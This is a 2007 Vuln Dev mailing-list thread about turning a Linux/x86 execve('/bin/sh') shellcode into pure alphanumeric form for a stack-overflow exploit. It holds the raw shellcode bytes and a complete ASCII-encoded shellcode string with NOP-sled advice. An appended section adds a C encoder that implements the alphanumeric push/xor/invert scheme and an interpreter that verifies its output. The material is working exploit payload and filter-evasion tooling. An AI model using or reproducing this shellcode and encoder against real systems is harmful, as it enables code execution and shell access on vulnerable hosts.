Vuln Dev
Re: Re: Linux restricted ASCII Shellcode Apr 22 2007 10:42AM
nonexistant nospam org (2 replies)
Re: Linux restricted ASCII Shellcode Apr 23 2007 07:58AM
shadown (shadown gmail com) (1 replies)
Re: Linux restricted ASCII Shellcode Apr 23 2007 08:51AM
shadown (shadown gmail com)
I forgot: at the end of that string goes a '\xc3' ->
'hAAAAX5AAAAHPPPPPPPPah4A00X5ZnCXPh0A00X50nRYPTYIII19hAA00X5Vb00PTY19hA0A0X5fpsOPTY19II19I19h0AA0X5OpeFPTY19II19I19h004AX5Bf8sPTY19I19II19h4040X58Bz8PTYII19h4520X58z9FPTY19I19I19I19h0000X5v7FvPTYI19I19h0AE0X58pzGPTY19II19hE000X5ZnFFPTYI19I19h555AX5ZZZUPTY19T\xc3'
This is the ShellForge alpha encoding technique.
BTW: Metasploit encoding should work; that is indeed a better solution
than the one above.

Cheers,
Sergio

shadown wrote:
> Hi,
>
> Here you have your shellcode in ASCII format.
>
> 'hAAAAX5AAAAHPPPPPPPPah4A00X5ZnCXPh0A00X50nRYPTYIII19hAA00X5Vb00PTY19hA0A0X5fpsOPTY19II19I19h0AA0X5OpeFPTY19II19I19h004AX5Bf8sPTY19I19II19h4040X58Bz8PTYII19h4520X58z9FPTY19I19I19I19h0000X5v7FvPTYI19I19h0AE0X58pzGPTY19II19hE000X5ZnFFPTYI19I19h555AX5ZZZUPTY19T'
>
> If the code you are trying to exploit does NOT allow non-ASCII NOPs (that
> actually is the only thing that makes sense), instead of '\x90' you will
> have to use some ASCII opcode/bytecode string that can be used as a NOP
> sled (for example 'A' -> inc ecx).
>
> Cheers,
> Sergio
>
> nonexistant (at) nospam (dot) org wrote:
>> Yes, I'm having a segfault, but I can't catch you...
>>
>> AFAIK when EIP is pointing somewhere in the NOP sled, it doesn't matter how the shellcode is aligned... Alignment has nothing to do with it...? Am I wrong?
>>
>> Moreover, I've tried more than 5 different ASCII shellcodes, all with the same result... always segfaulting. It looks as if the shellcodes were not working for some common reason...
>>
>> So, summarizing:
>>
>> 1. I can perfectly overwrite RET, thus having EIP pointing almost 100% of the time to the NOPs of my shellcode (in an environment variable)
>>
>> 2. My (non-ASCII) shellcode works perfectly
>>
>> 3. When I try with ANY pure ASCII shellcode, it fails 100% of the time.
>>
>>
>> What is happening?
>>
>>
>> I've tried with pure ASCII shellcodes ripped from http://shellcode.org/Shellcode/linux/ascii/ among others...
>>
>>
>> The Metasploit Framework failed to convert the original shellcode (the one that works) to pure ASCII with the selected charset (A-Z, a-z, 0-9).
>>
>>
>> That's the original shellcode:
>>
>>
>> \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
>>
>>
>> Is anyone able to convert this to pure ASCII, give me a working pure ASCII shellcode, or help me understand why all the pure ASCII shellcodes are failing in my exploit?
>>
>>
>> Thank you,
>>
>

--
Sergio Alvarez
Security, Research & Development
IT Security Consultant
email: shadown (at) gmail (dot) com

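Added example (mine; not part of Sergio's post and not ShellForge's source). The posted string can be read as x86-32 instructions whose opcodes are all printable: h = push imm32, X = pop eax, 5 = xor eax,imm32, P = push eax, T = push esp, Y = pop ecx, I = dec ecx, the pair 19 = xor [ecx],edi, H = dec eax, a = popad, and the trailing \xc3 = ret. Two alphanumeric bytes never XOR to a value with the high bit set, so the stub first gets 0xffffffff into every register through popad and then inverts selected bytes of each pushed dword in place with xor [ecx],edi at shifted offsets. The C program below implements that same push/pop/xor/invert scheme as an encoder and checks its output with a small interpreter for exactly those opcodes, so it runs on any host instead of needing a 32-bit Linux process with an executable stack. The shellcode constant is the one quoted in the thread; the interpreter, its fake stack and the second test payload are constructed for this example, and the A/B pairs chosen by split_byte are my own, so the letters of the emitted stub differ from the posted one while its shape (prologue, per-dword blocks, fix-ups, final T\xc3) is the same.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
static const char ALNUM[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
/* The 45-byte Linux/x86 execve("/bin/sh") shellcode quoted in the thread, as a C literal. */
static const uint8_t SHELLCODE[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
    "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define SHELLCODE_LEN (sizeof SHELLCODE - 1)

static uint32_t le32(const uint8_t *p)
{ return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static void put32(uint8_t *p, uint32_t v)
{ p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24); }

/* Alphanumeric a, b with a ^ b == t: possible only for t < 0x80 (two bytes in 0x30..0x7a never
   XOR to a value with bit 7 set), which is why the stub also has to invert bytes in place. */
static int split_byte(uint8_t t, char *a, char *b)
{
    for (const char *p = ALNUM; *p; p++) {
        uint8_t q = (uint8_t)*p ^ t;
        if (q && strchr(ALNUM, q)) { *a = *p; *b = (char)q; return 1; }
    }
    return 0;
}

/* Fix-ups for a dword just pushed at stack address S: "TY" (push esp; pop ecx) sets ecx = S,
   "I" (dec ecx) moves it down a byte, "19" (xor [ecx],edi with edi = 0xffffffff) inverts the
   4 bytes at ecx.  Bytes below S are junk the next push overwrites, so byte S+j ends up inverted
   f[0]^..^f[3-j] times; solving for f[] gives e.g. "TY19II19I19" for d8 40 cd 80, as in the post. */
static const char *flip_suffix(const uint8_t dw[4])
{
    static char buf[16];
    int n = 0, cur = 0, f[4] = { dw[3] >> 7, (dw[2] ^ dw[3]) >> 7, (dw[1] ^ dw[2]) >> 7, (dw[0] ^ dw[1]) >> 7 };
    if (!(f[0] | f[1] | f[2] | f[3])) { buf[0] = 0; return buf; }
    buf[n++] = 'T'; buf[n++] = 'Y';
    for (int k = 0; k < 4; k++) {
        if (!f[k]) continue;
        while (cur < k) { buf[n++] = 'I'; cur++; }
        buf[n++] = '1'; buf[n++] = '9';
    }
    buf[n] = 0;
    return buf;
}

/* Whole stub.  Prologue: eax = 0; dec eax; push it 8 times; popad, so edi = 0xffffffff.  Then per
   dword "h"A "X" "5"B "P" (push A; pop eax; xor eax,B; push eax) plus fix-ups, last dword first so
   the payload sits in order on top of the stack (bytes >= 0x80 go in inverted), and finally
   "T" 0xc3 = push esp; ret.  The payload is front-padded with NOPs to 4n bytes, as the post's is. */
static size_t alpha_encode(const uint8_t *payload, size_t len, uint8_t *out, size_t cap)
{
    static const char PROLOGUE[] = "hAAAAX5AAAAHPPPPPPPPa";
    uint8_t buf[260];
    size_t pad = (4 - len % 4) % 4, n = len + pad, pos = sizeof PROLOGUE - 1;
    if (len > 256 || cap < pos + n / 4 * 25 + 2) return 0;
    memset(buf, 0x90, pad); memcpy(buf + pad, payload, len); memcpy(out, PROLOGUE, pos);
    for (size_t d = n; d >= 4; d -= 4) {
        const uint8_t *dw = buf + d - 4;
        char a[4], b[4], *o = (char *)out + pos;
        for (int j = 0; j < 4; j++)
            if (!split_byte(dw[j] >= 0x80 ? (uint8_t)~dw[j] : dw[j], &a[j], &b[j])) return 0;
        o[0] = 'h'; memcpy(o + 1, a, 4); o[5] = 'X'; o[6] = '5'; memcpy(o + 7, b, 4); o[11] = 'P';
        const char *fx = flip_suffix(dw);
        memcpy(o + 12, fx, strlen(fx)); pos += 12 + strlen(fx);
    }
    out[pos++] = 'T'; out[pos++] = 0xc3;   /* the '\xc3' (ret) the reply adds at the end */
    return pos;
}

/* Interpreter for just the opcodes the stub uses, on a fake stack (a stand-in for a 32-bit CPU).
   Returns the stack offset the final ret jumps to, or 0 on an unexpected byte. */
static uint32_t run_stub(const uint8_t *code, size_t n, uint8_t *mem, uint32_t esp)
{
    uint32_t eax = 0, ecx = 0, edi = 0, v;
    for (size_t i = 0; i < n; i++) {
        switch (code[i]) {
        case 'h': if (i + 4 >= n) return 0; esp -= 4; put32(mem + esp, le32(code + i + 1)); i += 4; break;
        case '5': if (i + 4 >= n) return 0; eax ^= le32(code + i + 1); i += 4; break;   /* xor eax, imm32 */
        case 'X': eax = le32(mem + esp); esp += 4; break;        /* pop eax */
        case 'Y': ecx = le32(mem + esp); esp += 4; break;        /* pop ecx */
        case 'P': esp -= 4; put32(mem + esp, eax); break;        /* push eax */
        case 'T': v = esp; esp -= 4; put32(mem + esp, v); break; /* push esp */
        case 'H': eax--; break;  case 'I': ecx--; break;         /* dec eax / dec ecx */
        case '1': if (++i >= n || code[i] != '9') return 0; put32(mem + ecx, le32(mem + ecx) ^ edi); break;
        case 'a': edi = le32(mem + esp); ecx = le32(mem + esp + 24); eax = le32(mem + esp + 28); esp += 32; break;
        case 0xc3: return le32(mem + esp);                        /* ret */
        default: return 0;
        }
    }
    return 0;
}

/* Encode, check all but the last byte are alphanumeric, run the stub, and compare what it left
   on the stack with the NOP-padded payload.  Returns 1 on success. */
static int roundtrip(const uint8_t *payload, size_t len)
{
    uint8_t stub[2048], mem[4096] = {0};
    size_t pad = (4 - len % 4) % 4, n = alpha_encode(payload, len, stub, sizeof stub);
    if (!n) return 0;
    for (size_t i = 0; i + 1 < n; i++) if (!stub[i] || !strchr(ALNUM, stub[i])) return 0;
    uint32_t entry = run_stub(stub, n, mem, 2048); if (!entry) return 0;
    for (size_t i = 0; i < pad; i++) if (mem[entry + i] != 0x90) return 0;
    return memcmp(mem + entry + pad, payload, len) == 0;
}
```

roundtrip(SHELLCODE, SHELLCODE_LEN) returns 1 when the bytes the interpreted stub leaves on its stack equal the NOP-padded shellcode, and every byte alpha_encode writes except the trailing 0xc3 is in A-Z, a-z, 0-9; flip_suffix reproduces the fix-up sequences in the posted string (for the dword d8 40 cd 80 of the shellcode it yields TY19II19I19). What the emulation does not cover: on a real target the stub still has to live in executable memory and, as Sergio's post says, be preceded by an ASCII sled such as a run of 'A' (inc ecx) rather than \x90.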
Re: Re: Linux restricted ASCII Shellcode Apr 23 2007 03:56AM
Deian Stefan (deianstefan gmail com)
Copyright 2010, SecurityFocus